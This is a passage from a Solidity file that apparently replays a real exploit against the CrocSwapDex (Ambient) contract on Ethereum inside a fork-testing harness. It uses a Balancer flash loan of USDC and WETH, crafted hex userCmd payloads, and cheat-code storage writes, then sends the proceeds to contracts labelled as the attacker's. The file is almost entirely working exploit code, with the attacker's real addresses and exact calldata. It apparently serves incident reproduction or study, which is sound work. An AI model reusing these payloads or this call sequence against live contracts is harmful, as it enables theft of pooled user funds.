        ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        uint16 crocSwapDexUserCmdAmount_13 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
        {
            bytes memory userCmdPayload =
                hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000c9f2c9cd04674edea40000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a3168e34ee71dd2724ef00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_13), userCmdPayload);
        }
        ICrocQuery(LumosAddresses.CrocQuery).queryLevel(LumosAddresses.ZERO, LumosAddresses.USDC, 420, int24(212784));
        IERC20Like(LumosAddresses.USDC).balanceOf(LumosAddresses.attack_helper);
        {
            bytes memory userCmdPayload =
                hex"00000000000000000000000000000000000000000000000000000000000000050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a40000000000000000000000000000000000000000000000000000000000033f300000000000000000000000000000000000000000000000000000000000033f5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010002000000000000000000000000000000000ffff5433e2b3d8211706e6102aa947100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(2), userCmdPayload);
        }
        IERC20Like(LumosAddresses.USDC).balanceOf(LumosAddresses.attack_helper);
        ICrocQuery(LumosAddresses.CrocQuery).queryCurveTick(LumosAddresses.ZERO, LumosAddresses.USDC, 420);
        uint16 crocSwapDexUserCmdAmount_14 = 1; // value provenance: arg0=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
        {
            bytes memory userCmdPayload =
                hex"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000001a400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c9f2c9cd04674edea4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060dea3c5a176b572079e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(crocSwapDexUserCmdAmount_14), userCmdPayload);
        }
        {
            bytes memory userCmdPayload =
                hex"000000000000000000000000000000000000000000000000000000000000004a000000000000000000000000aac14d196a9e27923a92d8e87e3b6a5dcd4fec1b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
            ICrocSwapDex(LumosAddresses.CrocSwapDex).userCmd(uint16(3), userCmdPayload);
        }
        IERC20Like(LumosAddresses.USDC).balanceOf(LumosAddresses.attack_helper);
        {
            uint256 depositAmount = address(this).balance; // natural replay: wrap only ETH currently held by this replay frame
            if (depositAmount > 83721988711712491517) depositAmount = 83721988711712491517;
            if (depositAmount != 0) IWETH(LumosAddresses.WETH).deposit{value: depositAmount}();
        }
        uint256 usdcTransferAmount = 1; // value provenance: arg1=1 matches prior LumosAddresses.USDC.balanceOf(address) return with args (LumosAddresses.attack_helper)
        IERC20Like(LumosAddresses.USDC).transfer(LumosAddresses.Vault_BA1222, usdcTransferAmount);
        {
            LumosHarness.vmExt().startPrank(LumosAddresses.attack_helper); // artifact token-call sender context token_call_1479724: preserve observed ERC20 msg.sender/holder exactly; missing balance is a producer-flow gap, not a current-holder fallback
            IERC20Like(LumosAddresses.WETH).transfer(LumosAddresses.Vault_BA1222, 50000000000000000000);

            LumosHarness.vmExt().stopPrank();
        }
    }

    function _helperCb() internal {
        LumosHarness.vmExt().store(LumosAddresses.attack_helper, bytes32(uint256(11)), bytes32(uint256(0)));
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_helper,
                bytes32(uint256(12)),
                bytes32(uint256(917551056842671309452305380979543736893630245704))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_helper,
                bytes32(uint256(13)),
                bytes32(uint256(1461546239161582346370906367616202923829824460800))
            );
        LumosHarness.vmExt()
            .store(
                LumosAddresses.attack_helper,
                bytes32(uint256(14)),
                bytes32(uint256(15947517623696179619959689243712783))
            );
        {
            _recordBalancerFlash(_addressArray2(LumosAddresses.USDC, LumosAddresses.WETH)); // Balancer flashLoan post-check uses the live pre-loan vault balances
            if (LumosAddresses.attack_helper != address(this)) {
                (bool ok,) = LumosAddresses.attack_helper
                    .call(
                        abi.encodeWithSignature(
                            "lumosRecordBalancerFlashLoanPreBalances(address[])",
                            _addressArray2(LumosAddresses.USDC, LumosAddresses.WETH)
                        )
                    ); // share Balancer pre-balances with the observed flashLoan recipient/callback surface
                ok;
            }
            IVault_BA1222(LumosAddresses.Vault_BA1222)
                .flashLoan(
                    LumosAddresses.attack_helper,
                    _addressArray2(LumosAddresses.USDC, LumosAddresses.WETH),
                    _uintArray2(1, 50000000000000000000),
                    hex""
                );
        }
        IERC20Like(LumosAddresses.WETH).transfer(LumosAddresses.attack_contract, 33721988711712491517);
        IERC20Like(LumosAddresses.USDC).transfer(LumosAddresses.attack_contract, 55913808223);
    }

    function _helper() public {}

    function _helper2() public {}
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

library LumosArrayGuard {
    function capWithReserve(uint256 wanted, address token, address holder, uint256 reserve)
        internal
        view
        returns (uint256)
    {
        uint256 available = IERC20Like(token).balanceOf(holder);
        if (available > reserve) available -= reserve;
        else available = 0;
        return wanted > available ? available : wanted;
    }
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

interface VmExt {
    function store(address target, bytes32 slot, bytes32 value) external;
    function startPrank(address msgSender) external;
    function stopPrank() external;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant attack_contract = 0x0000000000031245f894ab515b42Dc0CE15adD0F; // LumosAddresses.attack_contract = 0x0000000000031245f894ab515b42dc0ce15add0f label=attack_contract roles=asset|attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|observed_address|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant attacker_eoa = 0x0000000000037E625B2502C26029Aea237f102aF; // LumosAddresses.attacker_eoa = 0x0000000000037e625b2502c26029aea237f102af label=attacker_eoa roles=attacker_eoa|contract|observed_address|recipient|sender source=tx_metadata.from confidence=high
    address internal constant A_000000_394A = 0x0000000000088c712A3282cd067366BA5E94394a; // LumosAddresses.A_000000_394A = 0x0000000000088c712a3282cd067366ba5e94394a label=0x0000000000088c712a3282cd067366ba5e94394a roles=code_contract|contract|economic_holder|observed_address|profit_holder|recipient|storage_contract source=asset_delta.profit_candidates confidence=medium
    address internal constant A_000000_8BA3 = 0x000000000022D473030F116dDEE9F6B43aC78BA3; // LumosAddresses.A_000000_8BA3 = 0x000000000022d473030f116ddee9f6b43ac78ba3 label=unresolved roles=asset|contract|observed_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant A_435068_02DD = 0x43506849D7C04F9138D1A2050bbF3A0c054402dd; // LumosAddresses.A_435068_02DD = 0x43506849d7c04f9138d1a2050bbf3a0c054402dd label=unresolved roles=asset|contract|observed_address|recipient source=unresolved confidence=low
    address internal constant A_4838B1_5F97 = 0x4838B106FCe9647Bdf1E7877BF73cE8B0BAD5f97; // LumosAddresses.A_4838B1_5F97 = 0x4838b106fce9647bdf1e7877bf73ce8b0bad5f97 label=0x4838b106fce9647bdf1e7877bf73ce8b0bad5f97 roles=code_contract|contract|economic_holder|observed_address|profit_holder|recipient|storage_contract source=asset_delta.profit_candidates confidence=medium
    address internal constant UniversalRouter = 0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af; // LumosAddresses.UniversalRouter = 0x66a9893cc07d91d95644aedd05d03f95e1dba8af label=UniversalRouter roles=asset|code_contract|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48; // LumosAddresses.USDC = 0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48 label=FiatTokenProxy token_symbol=USDC roles=asset|contract|observed_address|recipient|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant CrocSwapDex = 0xAaAaAAAaA24eEeb8d57D431224f73832bC34f688; // LumosAddresses.CrocSwapDex = 0xaaaaaaaaa24eeeb8d57d431224f73832bc34f688 label=CrocSwapDex roles=asset|code_contract|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant attack_helper = 0xAAC14D196A9E27923A92D8e87E3b6A5DCD4fEc1B; // LumosAddresses.attack_helper = 0xaac14d196a9e27923a92d8e87e3b6a5dcd4fec1b label=attack_helper roles=asset|attacker_contract|code_contract|contract|attack_helper_contract|localized_contract|observed_address|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant Vault_BA1222 = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.Vault_BA1222 = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=Vault roles=asset|contract|known_protocol|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; // LumosAddresses.WETH = 0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2 label=WETH9 token_symbol=WETH roles=asset|code_contract|contract|observed_address|recipient|sender|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant CrocQuery = 0xCA00926b6190c2C59336E73F02569c356d7B6b56; // LumosAddresses.CrocQuery = 0xca00926b6190c2c59336e73f02569c356d7b6b56 label=CrocQuery roles=observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant UniswapV3Pool = 0xE0554a476A092703abdB3Ef35c80e0D76d32939F; // LumosAddresses.UniswapV3Pool = 0xe0554a476a092703abdb3ef35c80e0d76d32939f label=UniswapV3Pool roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant ColdPath = 0xF8fe6fA0D9c778F8d814c838758B57a9Cf1dD710; // LumosAddresses.ColdPath = 0xf8fe6fa0d9c778f8d814c838758b57a9cf1dd710 label=ColdPath roles=code_contract source=etherscan_v2 confidence=high
}

interface IContract_000000_8BA3 {
    function approve(address, address, uint160, uint48) external;
}

interface ICrocQuery {
    function queryCurve(address, address, uint256) external view;
    function queryCurveTick(address, address, uint256) external view returns (uint256);
    function queryLevel(address, address, uint256, int24) external view;
    function queryPoolParams(address, address, uint256) external view;
}

interface ICrocSwapDex {
    function userCmd(uint16, bytes calldata) external payable;
}

interface IUniversalRouter {
    function execute(bytes calldata, bytes[] calldata) external;
}

interface IVault_BA1222 {
    function flashLoan(address, address[] calldata, uint256[] calldata, bytes calldata) external;
}

interface IWETH {
    function deposit() external payable;
    function withdraw(uint256) external;
}

library LumosHarness {
    function vmExt() internal pure returns (VmExt) {
        return VmExt(address(uint160(uint256(keccak256("hevm cheat code")))));
    }

    function safeBalance(address token, address account) internal view returns (uint256) {
        if (token.code.length == 0) return 0;
        (bool ok, bytes memory data) = token.staticcall(abi.encodeWithSignature("balanceOf(address)", account));
        if (!ok || data.length < 32) return 0;
        return abi.decode(data, (uint256));
    }
}
